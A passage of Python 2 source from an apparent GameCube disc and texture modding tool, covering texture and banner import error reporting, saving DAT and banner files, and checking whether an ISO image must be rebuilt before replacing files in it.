elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
# Finished iterating over the imported texture filepaths.
# Record that textures were updated for the current disc
if successfulImports > 0:
if successfulImports == 1: unsavedDiscChanges.append( '1 texture imported via Disc Import Method.' )
else: unsavedDiscChanges.append( str(successfulImports) + ' textures imported via Disc Import Method.' )
# Reload the DAT currently loaded in the DAT Texture Tree tab if it has had any of it's textures changed by this import method.
if datIidToReload and Gui.datTextureTree.get_children():
if globalDatFile.unsavedChanges:
warning = ( '"' + globalDatFile.path.split('/')[-1] + '" has been updated in the disc, however, the copy of it in the DAT Texture Tree '
'tab still has unsaved changes. Do you want to discard these changes and load the new file?' )
if tkMessageBox.askyesno( 'Unsaved Changes', warning ):
globalDatFile.unsavedChanges = []
loadFileWithinDisc( datIidToReload, changeTab=False )
else:
loadFileWithinDisc( datIidToReload, changeTab=False )
elif currentlySelectedTab == Gui.discDetailsTab: # For banners
if len( textureFilepaths ) > 1:
msg( "You may only import one banner at a time.", 'Too Many Files Imported' )
else:
textureFilepath = textureFilepaths[0]
if not globalBannerFile or not globalBannerFile.data:
msg( 'No banner file or disc appears to be loaded.', 'Cannot Import Banner Image' )
else:
status, return2, return3 = writeTextureToDat( globalBannerFile, textureFilepath, 0x20, False )
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated':
if globalBannerFile.source == 'disc':
bannerIid = globalBannerFile.path
newBannerData = hexlify( globalBannerFile.data )
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( bannerIid, 'values' )
Gui.isoFileTree.item( bannerIid, values=('Banner replaced', entity, isoOffset, fileSize, isoPath, 'ram', newBannerData), tags='changed' )
unsavedDiscChanges.append( 'Game banner image updated' )
else: # source = 'file'; i.e. it's a standalone file not from a disc
globalBannerFile.unsavedChanges.append( 'Game banner image updated' )
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
# Update the GUI wth the new image
updateBannerFileInfo( updateTextEntries=False ) # First arg: don't want to clear any other user data that might have been modified.
else:
# Remember errors to the user, to present once the import loop is finished.
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, '0x20') )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, True) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, '0x20') )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, '0x20', return2, return3) )
elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
elif currentlySelectedTab == Gui.datTab: # DAT Texture Tree direct imports
iidSelectionsTuple = Gui.datTextureTree.selection()
# Compose an error message if the inputs are invalid.
inputErrorMsg = ''
if not iidSelectionsTuple:
# This check is repeated from importImageFiles() because there are other ways files may be given to this function.
inputErrorMsg = 'You must select one or more textures to replace when importing textures on this tab.'
title = 'No Textures Selected'
elif len( textureFilepaths ) > 1: # isinstance( textureFilepaths, list) and
inputErrorMsg = "You may only import one texture at a time using this tab."
title = 'Too Many Files Imported'
if inputErrorMsg:
inputErrorMsg += "\n\nIf you'd like to import multiple textures to a standalone file (one not in a disc), then you can use the 'Manual Placement' tab. " + \
"Or, if you'd like to import one or more textures straight into a disc (using the filename to automatically dictate where each will go), " + \
"select the 'Disc File Tree' tab and try this operation again."
msg( inputErrorMsg, title )
else:
textureFilepath = textureFilepaths[0]
# Update the textures in the treeview (preview/full images, info, and data in the globalDatFile object)
for iid in iidSelectionsTuple: # Import the given texture (should only be one being imported in this case) to replace all selected textures. (int(iid)=imageDataOffset)
imageDataOffset = int( iid )
status, return2, return3 = writeTextureToDat( globalDatFile, textureFilepath, imageDataOffset, True )
print 'texture-write operation status:', status
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated': # Success
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
# Refresh the GUI (the texture display and all datTab tabs) if this is the currently displayed texture (last item in selection).
if iid == iidSelectionsTuple[-1]: onTextureTreeSelect( '', iid=iidSelectionsTuple )
else:
# Remember errors to the user, to present once the import loop is finished.
compensatedImageDataOffset = uHex( 0x20 + imageDataOffset )
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, compensatedImageDataOffset) )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, False) )
elif status == 'invalidMipmapDims': invalidMipmapDims.append( textureFilepath )
elif status == 'invalidImageProperties': invalidImageProperties.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'invalidPaletteProperties': invalidPaletteProperties.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, compensatedImageDataOffset) )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
elif currentlySelectedTab == Gui.mtrTab: showSelectedPaths( textureFilepaths )
elif currentlySelectedTab == Gui.cccTab: msg( 'Only character texture files are accepted here\n(e.g. .DAT, .USD, .LAT, etc.)' )
# Prepare an error message for any errors observed.
correctDimensions = 'The dimensions for a game banner should be 96 x 32. The width and height for standard textures should each not exceed 1024, and should be a multiple of 2. '
if failedImports > 0:
compoundImportErrorsMessage = ''
if len( textureFilepaths ) == 1: updateProgramStatus( 'Import Failed' )
else:
if successfulImports == 0:
updateProgramStatus( 'Imports Failed' )
compoundImportErrorsMessage = 'No textures could be imported. '
else: # Some were successful, while some failed. Get counts of each
updateProgramStatus( 'Some Imports Failed' )
if successfulImports == 1: compoundImportErrorsMessage = '1 texture was successfully imported. '
else: compoundImportErrorsMessage = str(successfulImports) + ' textures were successfully imported. '
if failedImports == 1: compoundImportErrorsMessage += 'However, 1 import failed.'
else: compoundImportErrorsMessage += 'However, ' + str(failedImports) + ' imports failed.'
if unconventionalNames:
if len( unconventionalNames ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( unconventionalNames[0] ) + '" could not be processed by '
"this import method because it doesn't appear to be using the standard naming convention. Ignoring extension, the standard naming convention is "
""""[sourceFile]_[textureOffset]_[textureType]". For example, "MnMaAll.usd_0x70580_0" or even "[your notes]_MnMaAll.usd_0x70580_0". As an alternative to renaming it, """
"you can import it using the DAT File Tree tab, which doesn't care about the image file's name." )
else: compoundImportErrorsMessage += ( "\n\nThe files below could not be processed by this import method because they don't "
"""appear to be using the standard naming convention. Ignoring extension, the standard naming convention is "[sourceFile]_[textureOffset]_[textureType]". """
"""For example, "MnMaAll.usd_0x70580_0" or even "[your notes]_MnMaAll.usd_0x70580_0". As an alternative to renaming them, """
"you can individually import them using the DAT File Tree tab, which doesn't care about the image files' names.\n\n" + '\n'.join(unconventionalNames) )
if filesNotFoundInDisc:
if len( filesNotFoundInDisc ) == 1: compoundImportErrorsMessage += '\n\n"' + os.path.basename( filesNotFoundInDisc[0][0] ) + \
' could not be imported because the game file "' + filesNotFoundInDisc[0][1] + '" was not found in the disc.'
else: compoundImportErrorsMessage += "\n\nSome textures couldn't be imported because the following game files were not found in the disc:\n\n" + \
'\n'.join( [failedImport[1] for failedImport in filesNotFoundInDisc] )
if formatUnsupported:
if len( formatUnsupported ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( formatUnsupported[0] ) + """" couldn't be imported because something """ + \
"indicates that it's not actually a TPL or PNG file (you might want to double-check the file extension, or try getting a new copy of the texture)." )
else: compoundImportErrorsMessage += ( """\n\nThe following files couldn't be imported because something indicates that they're not in TPL or PNG format """ + \
"(you might want to double-check the file extensions, or try getting a new copy of the textures):\n\n" + '\n'.join(formatUnsupported) )
if imageHeaderNotFound:
if len( imageHeaderNotFound ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( imageHeaderNotFound[0][0] ) + '" could not be imported because the offset '
'appears to be incorrect. No image data headers could be found for the data at its assigned destination (at ' + imageHeaderNotFound[0][1] + ")." )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because their offsets appear to be incorrect (no image data headers '
"could be found for them at their assigned destination):\n\n" + '\n'.join([failedImport[0] for failedImport in imageHeaderNotFound]) )
if imageTypeNotFound: # Is this case possible (should be irrelevant or caught by unconventionalNames)?
if len( imageTypeNotFound ) == 1: compoundImportErrorsMessage += ( '\n\nA texture type or palette type could not be determined for "' + os.path.basename( imageTypeNotFound[0] ) + '".' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because a texture type or palette type could not be determined:\n\n' + '\n'.join(imageTypeNotFound) )
if invalidDimensions:
if invalidDimensions[0][1]: correctDimensions = 'The dimensions for a game banner should be 96x32 pixels. ' # Checks bool packaged with texture path to see if it's a banner (import on disc details tab)
else: correctDimensions = 'The width and height for standard textures should not exceed 1024, and should be a multiple of 2. '
if len( invalidDimensions ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( invalidDimensions[0][0] ) + '" has invalid image dimensions. ' + correctDimensions )
else: compoundImportErrorsMessage += ( '\n\nThe textures below do not have valid dimensions. ' + correctDimensions + '\n\n' + '\n'.join([failedImport[0] for failedImport in invalidDimensions]) )
if invalidMipmapDims:
if len( invalidMipmapDims ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( invalidMipmapDims[0] ) + '" could not be imported because its dimensions '
"don't match the mipmap level you are trying to replace." )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because their dimensions don't match the mipmap levels they are assigned to replace." + \
'\n\n' + '\n'.join( invalidMipmapDims ) )
if invalidImageProperties:
if len( invalidImageProperties ) == 1:
filePath, imageDataOffset, origWidthHeight, origImageType = invalidImageProperties[0]
origWidth, origHeight = origWidthHeight
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( filePath ) + '" could not be imported to replace the texture at ' + imageDataOffset + \
' because it has invalid properties (width, height, or image type). Because there is no image data header in the DAT file '
'for this texture, the new texture to replace it must be {}x{}, with an image type of _{}'.format(origWidth, origHeight, origImageType) )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because they have invalid properties (width, height, or image type) for the "
'specific textures they are meant to replace (they must match the original texture):\n\n' + '\n'.join([failedImport[0] for failedImport in invalidImageProperties]) )
if invalidPaletteProperties:
if len( invalidPaletteProperties ) == 1:
filePath, imageDataOffset, origPaletteType, newPaletteType = invalidPaletteProperties[0]
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( filePath ) + '" could not be imported to replace the texture at ' + imageDataOffset + \
' because it has an invalid palette type. Because there is no image data header in the DAT file '
'for this texture, the new texture to replace it must have an image type of {}, however it had a palette type of {}.'.format(origPaletteType, newPaletteType) )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because they have invalid palette types for the "
'specific textures they are meant to replace (they must match the original texture):\n\n' + '\n'.join([failedImport[0] for failedImport in invalidPaletteProperties]) )
if notEnoughSpace:
if len( notEnoughSpace ) == 1: compoundImportErrorsMessage += ( '\n\nAfter conversion, the data for "' + os.path.basename( notEnoughSpace[0][0] ) + '" was too large to '
'replace the texture at ' + notEnoughSpace[0][1] + ". The cause could be the image type (which may be "
'specified in the file name; e.g. the "_3" in "MnSlChr.dat_0x51c0_3"), or that the image has the wrong dimensions.' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because, after conversion, their data was larger than that of the textures they '
'are assigned to replace. The cause could be the image type (which may be specified in the file name; e.g. the "_3" in "MnSlChr.dat_0x51c0_3"), '
'or that the images have the wrong dimensions.\n\n' + '\n'.join([failedImport[0] for failedImport in notEnoughSpace]) )
if paletteRegenerated and warnAboutPaletteRegen:
if len( paletteRegenerated ) == 1: compoundImportErrorsMessage += ( '\n\nThe original color palette in "' + os.path.basename( paletteRegenerated[0] ) + """" was too large for the texture it """ +
"was assigned to replace. So a new palette was generated for it, and the texture was successfully imported. However, this may have slightly altered the texture's colors. "
"(If you'd like to avoid this, create a palette for the texture yourself that does not exceed the max number of colors for this texture.)" )
else: compoundImportErrorsMessage += ( '\n\nThe original color palettes in the files below were too large for the textures they were assigned to replace. So new palettes were '
"generated for them, and they were successfully imported. However, this may have slightly altered the textures' colors. If you'd like to avoid this, create palettes "
"for the textures yourself that do not exceed the max number of colors for each respective texture.)\n\n" + '\n'.join(paletteRegenerated) )
if paletteTooLarge:
if len( paletteTooLarge ) == 1:
filepath, imageDataOffset, curPaletteColorCount, newPaletteColorCount = paletteTooLarge[0]
compoundImportErrorsMessage += ( '\n\nThe color palette in "' + os.path.basename( filepath ) + '" is too large for '
'the texture at "' + imageDataOffset + ". The new texture has " + newPaletteColorCount + " colors in its palette, "
"while the destination file only has space for " + curPaletteColorCount + " colors." )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because their color palettes are larger than those of the textures '
'they are assigned to replace:\n\n' + '\n'.join([failedImport[0] for failedImport in paletteTooLarge]) )
if paletteNotFound:
if len( paletteNotFound ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( paletteNotFound[0] ) + '" could not be imported because '
'the location of the color palette in the destination file could not be found.' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because the locations of their color palettes in the destination '
'file(s) could not be found:\n\n' + '\n'.join(paletteNotFound) )
if unknownErrors:
if len( unknownErrors ) == 1:
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( unknownErrors[0][0] ) + '" could not be imported due to an unknown error.\n\nStatus Code: ' + unknownErrors[0][1] )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported due to unknown errors:\n\n' + '\n'.join([failedImport[0] for failedImport in unknownErrors]) )
# Display the completed error message summary, and prompt to regenerate any invalid palettes.
regeneratePalettes = False
if paletteTooLarge and len( textureFilepaths ) == 1: # This was the only texture that was imported.
if tkMessageBox.askyesno( 'Re-generate Palette?', compoundImportErrorsMessage.lstrip() + '\n\nWould you like to enable the option "Regenerate Invalid Palettes" and attempt to re-import it?' ):
regeneratePalettes = True
else:
cmsg( compoundImportErrorsMessage.lstrip(), 'Import Errors', makeModal=True ) # lstrip will trim leading whitespace if there is any
if paletteTooLarge and tkMessageBox.askyesno( 'Re-generate Palettes?', 'For the texture imports that failed due to invalid palette sizes (having a palette with too many colors), '\
'would you like to enable the option "Regenerate Invalid Palettes" and attempt to re-import them?' ): regeneratePalettes = True
if regeneratePalettes:
global generalBoolSettings
# Turn on the setting to regenerate invalid palettes, and save it (must be saved now,
# because the settings in the menu are refreshed from the file each time the menu is opened)
generalBoolSettings['regenInvalidPalettes'].set( True )
saveSettingsToFile()
# Run the failed imports (those due to their palettes) back through the import functions.
processTextureImports( [failedImport[0] for failedImport in paletteTooLarge], currentlySelectedTab, warnAboutPaletteRegen=False )
else: # All imports successful
if successfulImports == 1: updateProgramStatus( 'Import Successful' )
elif successfulImports > 1: updateProgramStatus( 'Imports Successful' )
warnings = ''
if invalidDimensions:
#if invalidDimensions[0][1]: correctDimensions = 'The dimensions for a game banner should be 96 x 32. '
#else: correctDimensions = 'The width and height for standard textures should not exceed 1024. '
if len( invalidDimensions ) == 1: warnings += ( os.path.basename( invalidDimensions[0][0] ) + '" may have invalid image dimensions. ' + correctDimensions + \
'The texture was still imported successfully, but it might cause problems in-game.' )
else: warnings += ( 'The textures below might not have valid dimensions. ' + correctDimensions + 'The textures were still imported successfully, but ' +
'they might cause problems in-game.\n\n' + '\n'.join([failedImport[0] for failedImport in invalidDimensions]) )
if paletteRegenerated and warnAboutPaletteRegen:
if len( paletteRegenerated ) == 1: warnings += ( '\n\nThe original color palette in "' + os.path.basename( paletteRegenerated[0] ) + """" was too large for the texture it """ +
"was assigned to replace. So a new palette was generated for it, which may have slightly altered the texture's colors. (If you'd like to avoid this, create a palette "
'for the texture yourself that does not exceed the max number of colors for this texture.)', 'Palettes Regenerated' )
else: warnings += ( '\n\nThe original color palettes in the files below were too large for the textures they were assigned to replace. So new palettes were '
"generated for them, which may have slightly altered the textures' colors. (If you'd like to avoid this, create palettes for the textures "
'yourself that do not exceed the max number of colors for each respective texture.)\n\n' + '\n'.join(paletteRegenerated), 'Palettes Regenerated' )
if not warnAboutPaletteRegen: # This means that failed imports due to palette size were re-attempted and [since executing here] successful. Notify that it worked, but others were not re-attempted.
warnings += ( '\n\nThe palette regeneration and texture import was successful. (Any other textures that may have failed the previous import were not re-attempted.)' )
if warnings: cmsg( warnings.lstrip(), 'Warning' ) #todo; the invalidDimensions status on a particular texture will override the paletteRegenerated status; this should be fixed. make status a list?
#============================#
# ~ ~ Saving & Exporting ~ ~ #
#============================#
def saveDiscAs():
""" Called by the 'Save Disc As...' option. Prompts the user for a filename and location to save a new disc image. """
discFilePath = globalDiscDetails['isoFilePath']
discFileName = os.path.basename( discFilePath )
ext = os.path.splitext( discFilePath )[1].replace('.', '')
# Prompt for a place to save the file.
savePath = tkFileDialog.asksaveasfilename(
title="Where would you like to export the disc file?",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=discFileName,
defaultextension=ext,
filetypes=[('Standard disc image', '*.iso'), ('GameCube disc image', '*.gcm'), ("All files", "*.*")]
)
if savePath:
# Update the default directory to start in when opening or exporting files.
dirPath = os.path.dirname( savePath )
settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
saveChanges( newDiscPath=savePath )
def saveChanges( newDiscPath='' ):
""" Saves unsaved changes to the currently loaded DAT or banner file, and/or the disc.
If the DAT or banner is a standalone file (not loaded from a disc), it will only
be saved if the user is currently on that tab (DAT Texture Tree tab or Disc Details
tab, respectively), in which case the disc will not be affected/saved. The disc
will be saved in all other cases (i.e. no DAT/banner has changes, or they do have
changes and the file resides in the disc). """
global unsavedDiscChanges
saveSuceeded = False
currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
# Save the currently loaded DAT's changes first (in case it needs to go into a disc that's waiting to save changes)
if globalDatFile and globalDatFile.unsavedChanges:
filepath = globalDatFile.path
if globalDatFile.source == 'disc': # The file was loaded from the currently loaded disc image.
iid = filepath.lower()
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
Gui.isoFileTree.item( iid, values=('Updated from DAT tab', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(globalDatFile.getFullData())), tags='changed' )
unsavedDiscChanges.append( 'Updated data for file ' + isoPath.split('/')[-1] + '.' )
# saveSuceeded will be dependent on the iso saving step after this in this case, and the program status be updated then as well.
elif os.path.exists( filepath ):
if currentTab == Gui.datTab or currentTab == Gui.savTab or currentTab == Gui.mtrTab: # If not on one of these tabs, just go on to saving the banner file and/or disc
# The DAT is loaded from a standalone file; overwrite that nuhkka!
saveSuceeded = writeDatFile( filepath, globalDatFile.getFullData(), 'Save', globalDatFile ) # Will handle updating the program status
return saveSuceeded # Avoiding saving disc too
else:
updateProgramStatus( 'Unable to Save' )
msg( "Unable to find the original DAT file. Be sure that the file path is correct and that the file has not been moved.", 'Unable to Save' )
# Save the currently loaded banner file's changes
if globalBannerFile and globalBannerFile.unsavedChanges:
filepath = globalBannerFile.path
if globalBannerFile.source == 'disc': # The file was loaded from the currently loaded disc image.
iid = filepath.lower()
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
Gui.isoFileTree.item( iid, values=('Updated from Disc Details tab', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(globalBannerFile.data)), tags='changed' )
unsavedDiscChanges.append( 'Updated data for file ' + isoPath.split('/')[-1] + '.' )
# saveSuceeded will be dependent on the iso saving step after this in this case, and the program status be updated then as well.
elif os.path.exists( filepath ):
if currentTab == Gui.discDetailsTab: # If not on this tab, just go on to saving the disc
# The file is loaded from a standalone file; overwrite that nuhkka!
saveSuceeded = writeDatFile( filepath, globalBannerFile.data, 'Save', globalBannerFile ) # Will handle updating the program status
return saveSuceeded # Avoiding saving disc too
else:
updateProgramStatus( 'Unable to Save' )
msg( "Unable to find the original banner file. Be sure that the file path is correct and that the file has not been moved.", 'Unable to Save' )
# Save the ISO's changes
if unsavedDiscChanges or os.path.isdir( globalDiscDetails['isoFilePath'] ):
saveSuceeded = saveDiscChanges( newDiscPath )[0]
return saveSuceeded
def checkIfDiscNeedsRebuilding( gameId ):
""" While there are multiple operations which may result in the disc needing to be rebuilt, this one
scans the files in the Disc File Tree to see if there are any new files, or any modified files
that are now too big to simply be replaced in the disc's data without needing to move other files.
It also checks paths to standalone/external files that may be set for importing,
and alerts the user if there are any that can't be found. """
needsRebuilding = globalDiscDetails['rebuildRequired']
# Check if there's no FST in the disc (not expected, but you never know)
if not Gui.isoFileTree.exists( gameId + '/game.toc' ):
print 'No FST found! The disc will be rebuilt to create it.'
needsRebuilding = True
# Get a list of all files to go into the disc
isoFilesList = getFileTreeFiles()[0] # Returns a list populated by tuples of ( description, entity, isoOffset, fileSize, isoPath, source, data )
filesToReplace = [] # Only ends up being used if the disc will not be rebuilt
missingFiles = []
if needsRebuilding: # No rebuild determination needed. Just check whether external files needed for importing can be found
# Make sure all external files can be found.
for iidValues in isoFilesList:
_, _, isoOffset, fileSize, isoPath, source, data = iidValues
if source == 'path' and not os.path.exists( data ): missingFiles.append( data )
else:
# Order the list of files from the treeview by their offset
isoFilesList.sort( key=lambda iidValues: int(iidValues[2], 16) )
# Check through the files to validate any external file paths, and check whether there is natively enough space for larger files
for i, iidValues in enumerate( isoFilesList ):
_, _, isoOffset, fileSize, isoPath, source, data = iidValues
if source == 'iso': continue # No changes occurring with this file.
# Get the file size for new or modified files, and check filepaths for external files
elif source == 'path': # This file is scheduled to be replaced by an external/standalone file
if not os.path.exists( data ): # 'data' in this case will actually be a filepath to a standalone (external) file
missingFiles.append( data )
continue
elif not needsRebuilding:
newFileSize = int( os.path.getsize( data ) )
elif not needsRebuilding: # source == 'ram'; rebuild status still undetermined
newFileSize = len( data ) / 2
if needsRebuilding: continue # External path checked; nothing else to determine for this file.
elif isoOffset == '0' and i > 0: # Files beyond the first which have an offset of 0 are new external files being added to the disc
needsRebuilding = True # No original file in the disc, so a lot of extra space will need to be added
continue
# Collect location & size info on the original file to be replaced.
targetFileOffset = int( isoOffset, 16 )
originalFileSize = int( fileSize )
filesToReplace.append( (targetFileOffset, originalFileSize, isoPath, source, data) )
# Use the above info on this file to decide if rebuilding the ISO is necessary
if newFileSize != originalFileSize:
# The user may opt to avoid rebuilding the disc, which can ensure there is always a certain amount of padding between files
if not generalBoolSettings['avoidRebuildingIso'].get():
needsRebuilding = True # Guess there's no avoiding it....
else: # User wishes to avoid rebuilding. Let's see if that can be arranged.
if newFileSize > originalFileSize and i + 1 != len( isoFilesList ):
# Check whether there is currently enough space for the new file anyway, thanks to padding.
if isoPath.split('/')[-1].lower() == 'start.dol':
# Special case; will be considered together with the FST (since the latter must immediately follow the DOL, yet is itself movable)
nextEntryOffset = int( isoFilesList[ i + 2 ][2], 16 ) # Offset of the file following the FST
newFileSize += int( isoFilesList[ i + 1 ][3] ) # Should be the FST's file size
#print 'considering DOL import. nextEntryOffset:', hex(nextEntryOffset), 'combined file size:', hex(newFileSize)
else:
nextEntryOffset = int( isoFilesList[ i + 1 ][2], 16 )
if nextEntryOffset == 0: # Makes sure the next file to pull an offset from isn't a new file
needsRebuilding = True
else:
spareSpaceAfterImport = nextEntryOffset - targetFileOffset - newFileSize
#print 'spare space between files (with new file):', hex( spareSpaceAfterImport )
if spareSpaceAfterImport < 0: needsRebuilding = True
if missingFiles:
cmsg( 'These files could not be located for importing:\n\n' + '\n'.join( missingFiles ) )
globalDiscDetails['rebuildRequired'] = needsRebuilding
return needsRebuilding, filesToReplace
def saveDiscChanges( newDiscPath='' ):
""" Saves all changed files in an ISO to disc; either by replacing each file in-place
(and updating the FST) or rebuilding the whole disc. """
global unsavedDiscChanges
discFilePath = os.path.normpath( globalDiscDetails['isoFilePath'] )
fileWriteSuccessful = False
filesReplaced = [] # The following three lists will be of iids
filesAdded = []
filesUpdated = []
# Verify the path to the disc.
if not os.path.exists( discFilePath ):
updateProgramStatus( 'Disc Not Found' )
msg( 'There was a problem attemtping to save the disc changes. Possibly due to the file being deleted or moved.', 'Disc Not Found' )
return False, 0, 0
if isRootFolder( discFilePath )[0]: buildingFromRootFolder = True
else: buildingFromRootFolder = False
discExtOriginal = os.path.splitext( discFilePath )[1] # Inlucdes dot ('.')
discExt = discExtOriginal[1:].upper() # Removes the '.' as well
gameId = globalDiscDetails['gameId'].lower()
needsRebuilding, filesToReplace = checkIfDiscNeedsRebuilding( gameId )
# Ensure there is work to be done
if not needsRebuilding and not filesToReplace:
# If this occurs, there are probably external files to be imported that are missing (in which case the user has been notified)
cmsg( 'The following changes are still present and have not been saved to the disc:\n\n' + '\n'.join(unsavedDiscChanges) )
return False, [], []
elif needsRebuilding and 'Offset' in Gui.isoFileTree.heading( '#0', 'text' ):
msg( 'The disc cannot be rebuilt while\nthe files are sorted in this way.' )
return False, [], []
chunkSize = 4194304 # 4 MB. This is the chunk size that will be copied from ISO to ISO during the rebuild process.
guiUpdateInterval = 8388608 # 8 MB. Once this many bytes or more have been copied to the new disc, the gui should update the progress display
originalIsoBinary = None
backupFile = None
def getInChunks( sourceFile, offset, fileSize, chunkSize ):
""" Generator to get a file (from a specific offset) piece by piece. (Saves greatly on memory usage) """
sourceFile.seek( offset )
bytesCopied = 0
while True:
if bytesCopied + chunkSize >= fileSize:
remainingDataLength = fileSize - bytesCopied
yield sourceFile.read( remainingDataLength )
break # Ends this generator (conveys that it is exhausted).
else:
bytesCopied += chunkSize
yield sourceFile.read( chunkSize ) # Come back to this function for the next chunk of data after this.
# Check whether all system files are present and accounted for, and what boot file nomenclature/division is used
gcrSystemFiles = False
missingSystemFiles = False
for systemFile in [ '/boot.bin', '/bi2.bin', '/apploader.ldr', '/start.dol' ]:
systemFileIid = gameId + systemFile
if not Gui.isoFileTree.exists( systemFileIid ) and systemFile.endswith( '.bin' ):
if Gui.isoFileTree.exists( gameId + '/iso.hdr' ): # It's ok if boot.bin & bi2.bin don't exist if iso.hdr is available in their place
gcrSystemFiles = True
continue
missingSystemFiles = True
break
# Verify all required system files are present and accounted for before continuing.
if needsRebuilding and missingSystemFiles:
msg( 'A system file, ' + systemFileIid + ', could not be found. Cannot rebuild the ' + discExt + '.' )
return False, 0, 0
# Determine the location of the FST from the header file loaded in the GUI (may be new and not yet match the disc)
if gcrSystemFiles: headerFileData = getFileDataFromDiscTreeAsBytes( gameId + '/iso.hdr' )
else: headerFileData = getFileDataFromDiscTreeAsBytes( gameId + '/boot.bin' )
dolOffset = toInt( headerFileData[0x420:0x424] )
dolFileSize = getFileSizeFromDiscTree( gameId + '/start.dol' )
if dolFileSize == 0: return # Failsafe (DOL could have been external, and moved by user)
fstOffset = dolOffset + dolFileSize
# Write the file(s) to the ISO.
if not needsRebuilding:
def updateFstEntry( entries, targetFileOffset, newFileSize ):
for i, entry in enumerate( entries ):
if entry[:2] == '01': continue # Checks the directory flag to skip folders
entryOffset = int( entry[8:16], 16 )
# Update this entry with the new file length
if entryOffset == targetFileOffset:
entries[i] = entries[i][:-8] + "{0:0{1}X}".format( int(newFileSize), 8 )
break
systemFiles = [ 'boot.bin', 'bi2.bin', 'apploader.ldr', 'game.toc', 'iso.hdr', 'start.dol' ]
fstContentsUpdated = False
fstLocationUpdated = False
# Retrieve and parse the existing FST/TOC (File System Table/Table of Contents).
fstData = getFileDataFromDiscTree( gameId + '/game.toc' )
_, entries, strings = readFST( fstData ) # Returns an int and two lists
# Create a copy of the file and operate on that instead if using the 'Save Disc As' option
if newDiscPath:
try:
origFileSize = int( os.path.getsize(discFilePath) )
dataCopiedSinceLastUpdate = 0
with open( newDiscPath, 'wb' ) as newFile:
with open( discFilePath, 'rb' ) as originalFile:
for dataChunk in getInChunks( originalFile, 0, origFileSize, chunkSize ):
newFile.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
if dataCopiedSinceLastUpdate > guiUpdateInterval:
updateProgramStatus( 'Copying ' + discExt + ' (' + str( round( (float(newFile.tell()) / origFileSize) * 100, 1 ) ) + '%)' )
Gui.programStatusLabel.update()
dataCopiedSinceLastUpdate = 0
discFilePath = newDiscPath
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
# Save each file to the ISO directly, modifying the FST if required. Only FST file lengths may need to be updated.
try:
with open( discFilePath, 'r+b') as isoBinary:
importIndex = 1
for targetFileOffset, originalFileSize, isoPath, source, data in filesToReplace:
thisFileName = isoPath.split('/')[-1].lower()
padding = ''
# Update the GUI's progress display.
if len( filesToReplace ) > 1:
updateProgramStatus( 'Importing file ' + str(importIndex) + ' of ' + str(len( filesToReplace )) )
Gui.programStatusLabel.update()
importIndex += 1
# Collect location & size info on the original file to be replaced.
if source == 'path': newFileSize = int( os.path.getsize(data) )
else: newFileSize = len( data ) / 2 # source = 'ram'; there cannot be cases of source='iso' here
# Update this file entry's size value in the FST if it's different.
if newFileSize != originalFileSize:
if thisFileName in systemFiles: # This file isn't in the FST. A value in the disc's header may need to be updated.
